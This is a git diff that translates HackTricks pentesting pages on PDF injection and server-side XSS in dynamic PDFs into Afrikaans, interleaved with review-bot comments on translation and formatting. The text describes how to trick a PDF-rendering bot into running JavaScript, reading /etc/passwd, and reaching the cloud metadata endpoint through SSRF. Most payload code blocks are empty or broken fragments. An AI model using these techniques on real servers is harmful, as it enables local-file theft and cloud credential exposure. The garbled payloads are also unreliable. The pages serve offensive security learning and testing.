+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
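Review bot: In `@@ -442,78 +481,111 @@` the section under `## Outomatiese Blaaiertoegang om toetslading te toets` gains about thirty `+` lines that were not in the source: each paragraph appears twice, first in English (`+Sometimes, when testing for Cross-Site Scripting (XSS) vulnerabilities...`, `+There are several tools and techniques...`) and then in Afrikaans, together with new sub-headings `### Browser Extensions` / `### Blaaiertoepassing-uitbreidings`, `### Headless Browsers` / `### Koplose Blaaiers` and `### Remote Browser Services` / `### Afgeleë Blaaiertoepassing Dienste`. Besides being untranslated duplicates, the added text asserts that XSStrike and XSS Hunter are browser extensions, which the original page does not say, so the whole insertion should be dropped and only the translated heading kept in front of the puppeteer block. The puppeteer block and the `debugAccess` function in the same hunk lose all indentation (`- const browser = await puppeteer.launch();` becomes `+const browser = await puppeteer.launch();`, `- Object.defineProperty(obj, prop, {` becomes `+Object.defineProperty(obj, prop, {`), which should be reverted. Separately, the URL in the puppeteer example reads `&allowSymbols=true×tamp=1624556811000` in both the `-` and `+` lines, so it is pre-existing rather than introduced here, but it looks like an `&times` entity mangling of `&timestamp=` and is worth checking against the linked writeup.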
diff --git a/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/pentesting-web/xss-cross-site-scripting/pdf-injection.md index de0099f5d..9cc39c4a8 100644 --- a/pentesting-web/xss-cross-site-scripting/pdf-injection.md +++ b/pentesting-web/xss-cross-site-scripting/pdf-injection.md @@ -1,37 +1,33 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.** +**As jou inset in 'n PDF-lêer weerspieël word, kan jy probeer om PDF-data in te spuit om JavaScript uit te voer of die PDF-inhoud te steel.** -Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration) +Kyk na die pos: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md index 7c72c7862..22a5826d3 100644 --- a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md +++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md @@ -1,40 +1,39 @@ -# Server Side XSS (Dynamic PDF) +# Serverkant XSS (Dinamiese PDF)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Server Side XSS (Dynamic PDF) +## Serverkant XSS (Dinamiese PDF) -If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\ -So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**. +As 'n webbladsy 'n PDF skep deur gebruikersbeheerde insette te gebruik, kan jy probeer om die bot wat die PDF skep, te **verneuk om willekeurige JS-kode uit te voer**.\ +Dus, as die **PDF-skepper-bot** sekere soorte **HTML-etikette vind**, sal dit hulle **interpreteer**, en jy kan hierdie gedrag **misbruik** om 'n **Server XSS** te veroorsaak. -Please, notice that the `` tags don't work always, so you will need a different method to execute JS (for example, abusing `` etikette nie altyd werk nie, so jy sal 'n ander metode nodig hê om JS uit te voer (byvoorbeeld deur ` 
@@ -47,64 +46,56 @@ Also, note that in a regular exploitation you will be **able to see/download the ``` - ### SVG -Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples. - +Enige van die vorige of volgende payloads kan binne hierdie SVG payload gebruik word. Een iframe wat toegang tot die Burpcollab subdomein verkry en 'n ander wat toegang tot die metadata-eindpunt verkry, word as voorbeelde gegee. ```markup - - - - - - - - + + + + + + + + - - +xmlns="http://www.w3.org/2000/svg"> + + ``` +Jy kan baie **ander SVG-ladingstukke** vind in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet) -You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet) - -### Path disclosure - +### Pad-onthulling ```markup ``` +### Laai 'n eksterne skrip -### Load an external script - -The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time. - +Die beste manier om hierdie kwesbaarheid uit te buit, is om die kwesbaarheid te misbruik om die bot 'n skrip te laat laai wat jy plaaslik beheer. Dan sal jy in staat wees om die payload plaaslik te verander en die bot dit elke keer met dieselfde kode te laat laai. ```markup ')"/> ``` - -### Read local file / SSRF +### Lees plaaslike lêer / SSRF {% hint style="warning" %} -Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**. +Verander `file:///etc/passwd` na `http://169.254.169.254/latest/user-data` byvoorbeeld om **te probeer om 'n eksterne webblad (SSRF) te bereik**. 
-If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md). +As SSRF toegelaat word, maar jy **nie 'n interessante domein of IP kan bereik nie**, [kyk na hierdie bladsy vir potensiële omseilings](../ssrf-server-side-request-forgery/url-format-bypass.md). {% endhint %} - ```markup ``` @@ -130,7 +121,7 @@ x.open("GET","file:///etc/passwd");x.send(); -
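Review bot: In `@@ -47,64 +46,56 @@` the `markup` SVG block is edited purely for whitespace: the run of deleted `- ` lines is replaced by `+ ` lines and the `+xmlns="http://www.w3.org/2000/svg">` continuation is now flush-left, matching the indentation stripping seen in the other code blocks of this patch, and the blank lines before `### SVG`, `### Path disclosure` and `### Load an external script` are removed; a translation diff should not touch code fences or the blank lines around them. Terminology is also inconsistent: `payloads` is kept untranslated in `+Enige van die vorige of volgende payloads kan binne hierdie SVG payload gebruik word` but rendered `ladingstukke` in the next sentence (`+Jy kan baie **ander SVG-ladingstukke** vind`) and `lading` in the XSS page, and the footer of this file uses `hacktruuks` and `github-repos` while the same footer in `pdf-injection.md` uses `hacking-truuks` and `GitHub-opslagplekke`; pick one rendering for each term and apply it across the files.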